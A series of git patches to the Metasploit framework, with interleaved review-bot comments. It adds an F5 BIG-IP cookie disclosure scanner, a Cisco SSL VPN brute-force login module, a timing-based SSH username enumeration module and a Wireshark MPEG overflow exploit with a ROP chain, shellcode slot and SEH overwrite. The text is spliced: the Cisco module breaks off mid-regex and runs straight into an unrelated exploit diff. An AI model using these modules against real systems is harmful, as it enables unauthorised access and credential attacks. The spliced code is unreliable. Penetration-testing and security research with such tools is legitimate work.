!hosts[tip] hosts[tip] = Array.new end hosts[tip].push addresstp end - - if hosts[tip] - if !hosts[tip].empty? - report_note( - :host => tip.to_s, - :type => "RDNS_Record", - :data => hosts[tip] - ) - end + unless hosts[tip].nil? or hosts[tip].empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts[tip] + ) end rescue ::Interrupt raise $! From fecdbd1781b370e7b476e465372194d3d0552ac8 Mon Sep 17 00:00:00 2001 
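Review bot: In the last hunk the guard `unless hosts[tip].nil? or hosts[tip].empty?` uses the low-precedence `or` and reads the shared hash three times. The three-line `if !hosts[tip]` initialisation above it can be folded into `(hosts[tip] ||= []) << addresstp`, and the guard becomes `names = hosts[tip]` followed by `report_note(...) unless names.nil? || names.empty?`. The second hunk also still prints "queries per seconds"; "queries per second" is the intended wording.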
From: Thanat0s Date: Tue, 15 Apr 2014 01:11:17 +0200 Subject: [PATCH 109/853] F5 bigip cookie module --- .../http/f5_bigip_cookie_disclosure.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb new file mode 100644 index 0000000000..92fc28011c --- /dev/null +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb 
@@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', + 'Description' => %q{ + This module attempts to identify F5 SLB and decode sticky cookies wich leak + backend IP and port. + }, + 'Author' => [ 'Thanat0s' ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to test', '/']), + OptInt.new('RETRY', [true, 'Number of requests to find backends', 10]) + ], self.class) + end + + def cookie_decode(cookie_value) + m = cookie_value.match(/(\d+)\.(\d+)\./) + host = (m.nil?) ? nil : m[1] + port = (m.nil?) ? nil : m[2] + port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s + byte1 = ("%08X" % host).slice(6..7).hex.to_s + byte2 = ("%08X" % host).slice(4..5).hex.to_s + byte3 = ("%08X" % host).slice(2..3).hex.to_s + byte4 = ("%08X" % host).slice(0..1).hex.to_s + host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + return host,port + end + + def get_cook + res = send_request_raw({ + 'method' => 'GET', + 'uri' => @uri + }) + + #puts res.get_cookies + begin + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + # m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + ensure + id = (m.nil?) ? nil : m[1] + value = (m.nil?) ? 
nil : m[2] + return id, value + end + end + + def run + host_port = Hash.new + @uri = normalize_uri(target_uri.path) + print_status("Starting request #{@uri}") + id, value = get_cook() + if id + print_status "F5 cookie \"#{id}\" found" + host, port = cookie_decode(value) + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + i=1 # We already have done one request + until i == datastore['RETRY'] + id, value = get_cook() + host, port = cookie_decode(value) + unless ! host_port[host+":"+port].nil? + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + end + i += 1 + end + else + print_error "F5 SLB cookie not found" + end + end +end From 07ed8d832a3bd5e1fe4b415df466fd224d170215 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Tue, 15 Apr 2014 02:48:55 +0200 Subject: [PATCH 110/853] Update db --- .../http/f5_bigip_cookie_disclosure.rb | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 92fc28011c..9ac2c2e550 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb 
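Review bot: `get_cook` puts `return id, value` inside an `ensure` clause, which discards any exception raised in the `begin` body, including the `NoMethodError` when `res` is nil or has no `Set-Cookie` header and any interrupt raised there, so failures are indistinguishable from "no cookie". Replace the `begin`/`ensure` with explicit checks, e.g. `return nil, nil unless res && res.headers['Set-Cookie']`, then match and return. `cookie_decode` has the matching problem: when the regex does not match, `host` and `port` are nil and `"%04X" % port` raises, and the retry loop in `run` calls `cookie_decode(value)` without checking that a cookie was found; `return nil, nil if m.nil?` at the top plus a `next unless value` in the loop closes both. The byte shuffling could also be documented with a one-line comment giving the encoding (little-endian IPv4 address, byte-swapped port).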
@@ -14,17 +14,22 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', 'Description' => %q{ - This module attempts to identify F5 SLB and decode sticky cookies wich leak + This module identify F5 BigIP SLB and decode sticky cookies wich leak backend IP and port. }, - 'Author' => [ 'Thanat0s' ], + 'Author' => [ 'Thanat0s ' ], + 'References' => + [ + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html'], + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/7000/700/sol7784.html?sr=14607726'] + ], 'License' => MSF_LICENSE )) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to test', '/']), - OptInt.new('RETRY', [true, 'Number of requests to find backends', 10]) + OptInt.new('RETRY', [true, 'Number of requests to try to find backends', 10]) ], self.class) end @@ -41,17 +46,15 @@ class Metasploit3 < Msf::Auxiliary return host,port end - def get_cook + def get_cook # request a page and exctract a F5 looking cookie. res = send_request_raw({ 'method' => 'GET', 'uri' => @uri }) - #puts res.get_cookies begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - # m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] @@ -73,12 +76,22 @@ class Metasploit3 < Msf::Auxiliary until i == datastore['RETRY'] id, value = get_cook() host, port = cookie_decode(value) - unless ! host_port[host+":"+port].nil? + if ! host_port.has_key? host+":"+port host_port[host+":"+port] = true print_status "Backend #{host}:#{port}" end i += 1 end + # Reporting found backend in database + backends = Array.new + host_port.each do |key, value| + backends.push key + end + report_note( + :host => datastore['RHOST'], + :type => "F5_Cookie_Backends", + :data => backends + ) else print_error "F5 SLB cookie not found" end 
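Review bot: In the last hunk the backend list is built by iterating the hash and pushing each key (`host_port.each do |key, value| backends.push key end`), which leaves an unused `value` block parameter that also shadows the outer `value`; `backends = host_port.keys` does the same in one line. Since `host_port` only ever stores `true`, a `Set` (or the array itself with `include?`) would express the intent more directly than `if ! host_port.has_key? host+":"+port`. The description still reads "This module identify ... cookies wich leak"; "identifies" and "which" are meant.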
From 2ed7a739c3361063632442fc39add91227c2b1a2 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Wed, 16 Apr 2014 15:15:47 -0500 Subject: [PATCH 111/853] New reports in new exports can now import MSP-9783 * Extracted import_report from monstrous import_msf_collateral; simplified and clarified approach * Updated report_report: includes all attrs provided vs subset, provides more helpful error message * Added report_artifact: adds child artifact for reports, handles various troublesome cases * Tested on all report types with a legion of option variants --- lib/msf/core/db.rb | 144 +++++++++++++++++++++++++++++---------------- 1 file changed, 92 insertions(+), 52 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index c74b205f0b..bbe8b7f790 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb 
@@ -2172,35 +2172,63 @@ class DBManager end - # - # Find or create a task matching this type/data - # + # TODO This method does not attempt to find. It just creates + # a report based on the passed params. def find_or_create_report(opts) report_report(opts) end + # Creates a Report based on passed parameters. Does not handle + # child artifacts. + # @param opts [Hash] + # @return [Integer] ID of created report def report_report(opts) return if not active ::ActiveRecord::Base.connection_pool.with_connection { - wspace = opts.delete(:workspace) || workspace - path = opts.delete(:path) || (raise RuntimeError, "A report :path is required") - ret = {} - user = opts.delete(:user) - options = opts.delete(:options) - rtype = opts.delete(:rtype) - report = wspace.reports.new - report.created_by = user - report.options = options - report.rtype = rtype - report.path = path - msf_import_timestamps(opts,report) - report.save! + report = Report.new(opts) + unless report.valid? + errors = report.errors.full_messages.join('; ') + raise RuntimeError "Report to be imported is not valid: #{errors}" + end + report.state = :complete # Presume complete since it was exported + report.save - ret[:task] = report + report.id } end + # Creates a ReportArtifact based on passed parameters. + # @param opts [Hash] of ReportArtifact attributes + def report_artifact(opts) + artifacts_dir = Report::ARTIFACT_DIR + tmp_path = opts[:file_path] + artifact_name = File.basename tmp_path + new_path = File.join(artifacts_dir, artifact_name) + + unless File.exists? tmp_path + raise DBImportError 'Report artifact file to be imported does not exist.' + end + + unless (File.directory?(artifacts_dir) && File.writable?(artifacts_dir)) + raise DBImportError "Could not move report artifact file to #{artifacts_dir}." + end + + if File.exists? 
new_path + unique_basename = "#{(Time.now.to_f*1000).to_i}_#{artifact_name}" + new_path = File.join(artifacts_dir, unique_basename) + end + + FileUtils.copy(tmp_path, new_path) + opts[:file_path] = new_path + artifact = ReportArtifact.new(opts) + unless artifact.valid? + errors = artifact.errors.full_messages.join('; ') + raise RuntimeError "Artifact to be imported is not valid: #{errors}" + end + artifact.save + end + # # This methods returns a list of all reports in the database # 
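Review bot: All four new error paths are missing the comma after the exception class, e.g. `raise RuntimeError "Report to be imported is not valid: #{errors}"` and `raise DBImportError 'Report artifact file to be imported does not exist.'`; Ruby parses these as a call to a method named `RuntimeError`/`DBImportError`, so the import fails with `NoMethodError` instead of the intended message. They should read `raise RuntimeError, "Report to be imported is not valid: #{errors}"` and likewise for the other three. `report.save` and `artifact.save` also ignore the boolean result where the old code used `save!`, so a failed write is reported as success. `Report.new(opts)` mass-assigns whatever keys the import file supplied, which is worth restricting to an explicit list of attributes.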
@@ -3793,43 +3821,55 @@ class DBManager # Import Reports doc.elements.each("/#{btag}/reports/report") do |report| - tmp = args[:ifd][:zip_tmp] - report_info = {} - report_info[:workspace] = args[:wspace] - # Should user be imported (original) or declared (the importing user)? - report_info[:user] = nils_for_nulls(report.elements["created-by"].text.to_s.strip) - report_info[:options] = nils_for_nulls(report.elements["options"].text.to_s.strip) - report_info[:rtype] = nils_for_nulls(report.elements["rtype"].text.to_s.strip) - report_info[:created_at] = nils_for_nulls(report.elements["created-at"].text.to_s.strip) - report_info[:updated_at] = nils_for_nulls(report.elements["updated-at"].text.to_s.strip) - report_info[:orig_path] = nils_for_nulls(report.elements["path"].text.to_s.strip) - report_info[:task] = args[:task] - report_info[:orig_path].gsub!(/^\./, tmp) if report_info[:orig_path] - - # Only report a report if we actually have it. - # TODO: Copypasta. Seperate this out. - if ::File.exists? report_info[:orig_path] - reports_dir = ::File.join(basedir,"reports") - report_file = ::File.split(report_info[:orig_path]).last - if ::File.exists? 
reports_dir - unless (::File.directory?(reports_dir) && ::File.writable?(reports_dir)) - raise DBImportError.new("Could not move files to #{reports_dir}") - end - else - ::FileUtils.mkdir_p(reports_dir) - end - new_report = ::File.join(reports_dir,report_file) - report_info[:path] = new_report - if ::File.exists?(new_report) - ::File.unlink new_report - else - report_report(report_info) - end - ::FileUtils.copy(report_info[:orig_path], new_report) - yield(:msf_report, new_report) if block - end + import_report(report, args, basedir) end + end + # @param report [REXML::Element] to be imported + # @param args [Hash] + # @param base_dir [String] + def import_report(report, args, base_dir) + tmp = args[:ifd][:zip_tmp] + report_info = {} + + report.elements.each do |e| + node_name = e.name + node_value = e.text + + # These need to be converted back to arrays: + array_attrs = %w|addresses file-formats options sections| + if array_attrs.member? node_name + node_value = JSON.parse(node_value) + end + # Don't restore these values: + skip_nodes = %w|id workspace-id artifacts| + next if skip_nodes.member? node_name + + report_info[node_name.parameterize.underscore.to_sym] = node_value + end + # Use current workspace + report_info[:workspace_id] = args[:wspace].id + + # Create report, need new ID to record artifacts + report_id = report_report(report_info) + + # Handle artifacts + report.elements['artifacts'].elements.each do |artifact| + artifact_opts = {} + artifact.elements.each do |attr| + skip_nodes = %w|id accessed-at| + next if skip_nodes.member? attr.name + + symboled_attr = attr.name.parameterize.underscore.to_sym + artifact_opts[symboled_attr] = attr.text + end + # Use new Report as parent + artifact_opts[:report_id] = report_id + # Update to full path + artifact_opts[:file_path].gsub!(/^\./, tmp) + + report_artifact(artifact_opts) + end end # Convert the string "NULL" to actual nil From f53e7f84b88c9912aa3a90682f4211cdea4f2795 Mon Sep 17 00:00:00 2001 
From: Jonathan Claudius Date: Wed, 16 Apr 2014 22:47:58 -0400 Subject: [PATCH 112/853] Adds Cisco SSL VPN Bruteforce Aux Mod --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 193 ++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 modules/auxiliary/scanner/http/cisco_ssl_vpn.rb diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb new file mode 100644 index 0000000000..bbd349df0f --- /dev/null +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb 
@@ -0,0 +1,193 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Cisco SSL VPN Bruteforce Login Utility', + 'Description' => %{ + This module scans for Cisco SSL VPN web login portals and + performs login brute force to identify valid credentials. + }, + 'Author' => + [ + 'Jonathan Claudius ', + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]), + OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']), + OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco']), + OptString.new('GROUP', [false, "A specific VPN group to use", '']) + ], self.class) + end + + def run_host(ip) + unless check_conn? + print_error("#{peer} - Connection failed, Aborting...") + return + end + + unless is_app_ssl_vpn? + print_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + return + end + + print_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + + groups = Set.new + if datastore['GROUP'].empty? + print_status("#{peer} - Attempt to Enumerate VPN Groups...") + groups = enumerate_vpn_groups + print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") unless groups.empty? 
+ else + groups << datastore['GROUP'] + end + groups << "" + + print_status("#{peer} - Starting login brute force...") + groups.each do |group| + each_user_pass do |user, pass| + do_login(user, pass, group) + end + end + end + + # Verify whether the connection is working or not + def check_conn? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + print_good("#{peer} - Server is responsive...") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + return + end + end + + def enumerate_vpn_groups + res = send_request_cgi({ + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + }) + + groups = Set.new + group_name_regex = / 0x68e2bfb9, } ], 
@@ -66,28 +66,29 @@ class Metasploit3 < Msf::Exploit::Remote def junk return rand_text(4).unpack("L")[0].to_i end + def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] - 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] - 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] - 0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll] - 0x63cd04f1, # & push esp # ret [liblzma-5.dll] - 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx - 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx - 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] - 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] - 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop - 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets 
@@ -98,14 +99,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + packet = pattern_create(892) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) - packet << "\x90\x90\x90\x90" # nseh - # 0xff is badchar then we can't make a jump back with jmp $-2000 + packet << make_nops(4) # nseh + # \0xff is a badchar then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN From cc2d4f9ed7f44b6595c4c1d6da73a3755b7dc4f2 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:03:22 +0200 Subject: [PATCH 119/853] Remove unnecesary @good_credentials --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index f8f36d63de..7c2750235b 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - attr_accessor :ssh_socket, :good_credentials + attr_accessor :ssh_socket THRESHOLD = 10 @@ -55,7 +55,6 @@ class Metasploit3 < Msf::Auxiliary ) deregister_options('RHOST') - @good_credentials = {} end From 47ff820a830e86dcfb110a11738e1412941dfe70 Mon Sep 17 00:00:00 2001 
From: kenkeiras Date: Fri, 18 Apr 2014 21:06:46 +0200 Subject: [PATCH 120/853] Remove unnecesary 'RHOST' deregister --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 7c2750235b..f2519b55d9 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -53,8 +53,6 @@ class Metasploit3 < Msf::Auxiliary ' for each user', 3]) ] ) - - deregister_options('RHOST') end From 8a3329c8917c54ba8034e7507746c1dfef16cbad Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:10:34 +0200 Subject: [PATCH 121/853] Password made pseudo-random instead of a bunnch of A's --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index f2519b55d9..d3b17b1366 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary def check_user(ip, user, port) - pass = 'A' * 64_000 + pass = Rex::Text.rand_text_alphanumeric(64_000) opt_hash = { :auth_methods => ['password', 'keyboard-interactive'], From c875bdadf5c9d99fbe524b640e22116a7bc33955 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:18:48 +0200 Subject: [PATCH 122/853] Change THRESHOLD into a datastore option --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index d3b17b1366..c9c9ed994f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
@@ -14,8 +14,6 @@ class Metasploit3 < Msf::Auxiliary attr_accessor :ssh_socket - THRESHOLD = 10 - def initialize super( 'Name' => 'SSH Username Enumeration', @@ -34,6 +32,10 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('USER_FILE', [true, 'File containing usernames, one per line', nil]), + OptInt.new('THRESHOLD', + [true, + 'Amount of seconds needed before a user is considered ' \ + 'found', 10]), Opt::RPORT(22) ], self.class ) @@ -64,6 +66,9 @@ class Metasploit3 < Msf::Auxiliary datastore['RETRY_NUM'] end + def threshold + datastore['THRESHOLD'] + end def check_user(ip, user, port) pass = Rex::Text.rand_text_alphanumeric(64_000) @@ -102,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary finish_time = Time.new - if finish_time - start_time > THRESHOLD + if finish_time - start_time > threshold return :success else return :fail From fb0af8a799802fc3de233e9347479af055dac2de Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 18 Apr 2014 21:46:51 +0200 Subject: [PATCH 123/853] Remove unnecesary ssh_socket variable --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index c9c9ed994f..fe216cb3df 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,8 +12,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - attr_accessor :ssh_socket - def initialize super( 'Name' => 'SSH Username Enumeration', @@ -90,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - ssh_socket = Net::SSH.start(ip, user, opt_hash) + Net::SSH.start(ip, user, opt_hash) end rescue Rex::ConnectionError, Rex::AddressInUse From b8e0187647ce3016e3c913674a4db2c032c98787 Mon Sep 17 00:00:00 2001 
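Review bot: In the hunk at -90,7 the session returned by `Net::SSH.start(ip, user, opt_hash)` is now discarded, so if the call ever returns (a login that unexpectedly succeeds) nothing closes the connection. As far as the hunk shows, the removed `ssh_socket =` assignment did not close it either, but since the line is being touched it could become `Net::SSH.start(ip, user, opt_hash).close`. `check_user` starts and ends outside this hunk, so a close elsewhere in the method cannot be ruled out from here.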
From: kenkeiras Date: Fri, 18 Apr 2014 21:56:17 +0200 Subject: [PATCH 124/853] Use OptPath for file path options --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index fe216cb3df..306b98b707 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('USER_FILE', + OptPath.new('USER_FILE', [true, 'File containing usernames, one per line', nil]), OptInt.new('THRESHOLD', [true, From 97ef53a1d172fc11381aaa8da98f388add042171 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Fri, 18 Apr 2014 16:45:07 -0500 Subject: [PATCH 125/853] Add upper bound for active-* gems We do not yet support ActiveRecord and ActiveSupport 4.x, so ensure our Gemfile declares this. --- Gemfile | 4 ++-- Gemfile.lock | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile b/Gemfile index c6f821cd4c..9045947d35 100755 --- a/Gemfile +++ b/Gemfile @@ -1,7 +1,7 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern -gem 'activesupport', '>= 3.0.0' +gem 'activesupport', '>= 3.0.0', '< 4.0.0' # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) gem 'bcrypt' # Needed for some admin modules (scrutinizer_add_user.rb) @@ -19,7 +19,7 @@ gem 'packetfu', '1.1.9' group :db do # Needed for Msf::DbManager - gem 'activerecord' + gem 'activerecord', '>= 3.0.0', '< 4.0.0' # Database models shared between framework and Pro. gem 'metasploit_data_models', '~> 0.17.0' # Needed for module caching in Mdm::ModuleDetails diff --git a/Gemfile.lock b/Gemfile.lock index 379ea1cb81..8c708c0467 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
@@ -61,8 +61,8 @@ PLATFORMS ruby DEPENDENCIES - activerecord - activesupport (>= 3.0.0) + activerecord (>= 3.0.0, < 4.0.0) + activesupport (>= 3.0.0, < 4.0.0) bcrypt database_cleaner factory_girl (>= 4.1.0) From 7bc546e69a8e86b81ea91a450f6a72ff8ee3506b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 17:45:28 +0100 Subject: [PATCH 126/853] Add rand_text_alpha function --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 89b19f7b5a..3034a0c0f1 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { - 'BadChars' => "\xff\x00", + 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 @@ -63,10 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def junk - return rand_text(4).unpack("L")[0].to_i - end - def create_rop_chain() # rop chain generated with mona.py - www.corelan.be @@ -98,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + packet = rand_text_alpha(891) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode From 3861541204e6bd23bb92b5e5d64179ca3e36355a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 18:37:58 +0100 Subject: [PATCH 127/853] Add more rand_text_alpha functions --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
